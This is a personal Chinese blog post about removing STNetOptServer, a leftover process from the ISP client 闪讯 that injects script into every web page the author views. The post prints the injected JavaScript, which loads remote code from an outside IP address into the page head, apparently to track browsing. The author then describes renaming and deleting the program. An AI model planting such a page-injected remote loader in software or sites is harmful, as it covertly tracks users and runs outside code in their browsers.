STNetOptServer垃圾进程删除记

最近由于自己网站的关系,经常在浏览器下查看源码。在WINDOW下,发现在所有的浏览器的网页源码后面被添加了一段script代码,看起来非常不爽啊,于是打算干掉这个不良插件。几番查找,发现是闪讯这个垃圾货造成的,也就闪通吧,电信推出的联网客服端,实际就是个垃圾软件。

个人原创,转载请注明原文出处,并保留原文链接:

http://www.embbnux.com/2014/04/20/stnetoptserver_process_delete/ 

说说我的网页被插入script的的源码


(function(){var js = document.createElement("script");
js.src="115.238.147.102/A0EED19F1C1CB08BDED1D52D5DA33474?id=1&t=3853224&m=46455bcbbf5eb736"+Math.random();
var h = document.getElementsByTagName("head")[0];
h.appendChild(js);})()

应该是在记录浏览网页的数据吧。

看着非常不爽。

网上说是闪讯的问题,关键是我一年前就把闪讯给删了,怎么还在呢。用任务管理器查看进程,发现尽然还处在着两个STNetOptServer进程,一看就是闪讯删除不干净,而且是开机运行。

尝试关闭那两个进程,发现竟然还关闭不了,一关闭马上就自动恢复回来。太贱了啊。

右键改进程,选择打开文件位置,找到有这个程序的文件,就是STNetOptServer。exe这个垃圾货。试着删掉,提示有程序正在使用该文件,无法删除。更贱了。

那个程序肯定就是那个进程了。

聪明机智的办法:

那个文件虽然删不掉,但是可以重命名,就把.exe改成.txt。哈哈,让你再运行。

然后在任务管理器把该进程删掉,就不会再次启动了。再安心把这些垃圾程序文件删掉。

完美解决了。

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

Time limit is exhausted. Please reload the CAPTCHA.

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据